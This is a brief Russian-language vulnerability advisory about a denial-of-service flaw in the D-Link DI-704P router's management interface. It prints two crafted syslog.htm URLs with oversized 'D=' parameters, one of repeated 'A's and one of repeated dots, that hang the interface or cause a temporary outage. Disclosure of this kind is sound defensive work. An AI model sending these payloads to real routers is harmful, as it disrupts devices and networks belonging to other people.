Отказ в обслуживании обнаружен в D-Link DI-704P Router. Удаленный авторизованный пользователь может завесить работу управляющего интерфейса. 

Удаленный авторизованный пользователь может послать специально сформированный URL к управляющему интерфейсу маршрутизатора, чтобы нарушить работу устройства. Следующий URL заставит устройство выполнить DNS запрос: 

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA

Результат DNS запроса будет следующий: 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA @xxxx.xx.comcast.net

Если представлено несколько подобных URL запросов, временный отказ в обслуживании
произойдет на маршрутизаторе. 

Следующий тип URL завесит управляющий интерфейс маршрутизатора, пока он не будет перезагружен: (работа маршрутизатора не нарушится): 

http://192.168.0.1/syslog.htm?

D=……………………….. ……………………………………..
…………………………………………………………………
……………………………………….. ……………………….
…………………………………………………………………
……………………………………………………… …………
…………………………………………………………………
…………………………………………………………………
.. ……………………………………………………………….
…………………………………………………………………
……………… …………………………………………………
………………..

Уязвимость обнаружена в D-Link DI-704P.



Оставить мнение